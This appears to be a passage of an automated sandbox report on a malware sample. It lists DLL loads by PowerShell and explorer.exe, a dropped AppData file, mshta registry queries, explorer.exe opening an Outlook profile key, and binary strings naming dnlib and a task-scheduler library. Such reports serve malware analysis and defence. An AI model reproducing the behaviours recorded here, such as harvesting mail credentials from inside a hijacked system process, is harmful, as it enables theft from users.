Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\djvbaae	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetl